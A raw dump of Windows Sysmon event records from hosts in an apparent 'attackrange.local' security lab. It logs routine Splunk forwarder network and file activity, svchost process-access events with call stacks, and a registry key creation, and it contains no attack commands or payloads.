354300x80000000000000001606582Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:43.576{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49735-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606581Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606580Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85293EFC81F605A5469D18E2CA52E764,SHA256=289FC1246FE42667FE2889CEE5BE0DF9DB61D356F792DD31045F80E3243E6C51falsefalse - insufficient disk space 11241100x80000000000000001606579Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606578Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05845FA7006DE939CD04892F44D6EECE,SHA256=B736DB483C48D70A1B1C89D815986D2565F5F3042BBCFE5298EF3296C74456A5falsefalse - insufficient disk space 11241100x80000000000000001606577Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.148{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606576Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.148{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F70AA38FBD896ABE5219565360115F,SHA256=F20885990CB859F9CD5E69EBD93A8B55BD079FC7474145E8308810E0AC0272D2falsefalse - insufficient disk space 10341000x80000000000000001095293Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:45.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095292Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:45.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095297Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:46.910{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F29463740C82E180B3B6F6FFCA335FB,SHA256=C578C897BA3490D046F47EA4B78BC9D1B382D813D12416BC7657FE07B35A7E4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095296Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:46.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095295Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:46.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x80000000000000001606585Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:18:46.798{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\system32\svchost.exeHKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad 
11241100x80000000000000001606584Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:46.150{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606583Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:46.150{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A74FA7962A2391BCF1D6132587CBD78,SHA256=A7C52A7EE26A6B65AC2A1A2185658537B93B3132D446BA5B7C21AC075CD84522falsefalse - insufficient disk space 23542300x80000000000000001095303Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.917{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF18EBEA977FF6865C62A36B20408392,SHA256=0CB2900688DB24460BC8036684854594D16C5D01FAE3CD9324F59E868B6ADE66,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001095302Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.707{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1161-false10.0.1.12-8000- 10341000x80000000000000001095301Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:47.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095300Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095299Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.113{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F69A3C29F3AB110FE1FC3E2BA29A399C,SHA256=C7301B5E4E35B815E02B49DBAFC78F471A8C7B543A6768BCC49A59AC7BD22472,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095298Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.112{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03416162111EAB6658E3A3BB72CDB9E9,SHA256=9D7204673DD429A5C2B0B7444FB701103817CE8A98C52E00B0D31024C6A70A65,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606587Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:47.153{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606586Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:47.153{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=946CCCC17E572035DD51F39062157628,SHA256=A9119884A23FFA5B36CB3037F7434CE93017A2B7EB0665B20E0A5FB27545CE78falsefalse - insufficient disk space 23542300x80000000000000001095306Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:48.936{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C3816E2D11DDC8116AE9715F7045720,SHA256=F288AFE5B1A3641592D288F5184F3422A95E1878705045F8175EE697FC8F5FC3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606589Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:48.155{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606588Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:48.155{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27552A826A9EA5F452379B059D55211B,SHA256=9C3D3FC72BFC3979813B46B9C675536CF32D9E292B69C46DDBBB7742853E23DCfalsefalse - insufficient disk space 10341000x80000000000000001095305Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:48.522{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095304Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:00.531{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095348Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:00.531{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095347Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:00.035{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566CEAC28733B8B7454C7D932E617D11,SHA256=582566B395EFAB8F30705BBD09220ADE58BDB9036FC627E040502AC942956A90,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001606664Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D1-607D-0101-00000000BB01}4292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606663Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D1-607D-0101-00000000BB01}4292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606662Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D1-607D-0101-00000000BB01}4292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606661Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606660Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606659Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606658Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-EB00-00000000BB01}1744C:\Windows\System32\RuntimeBroker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606657Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606656Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606655Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606654Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606653Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84D0-607D-0001-00000000BB01}5072C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606652Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
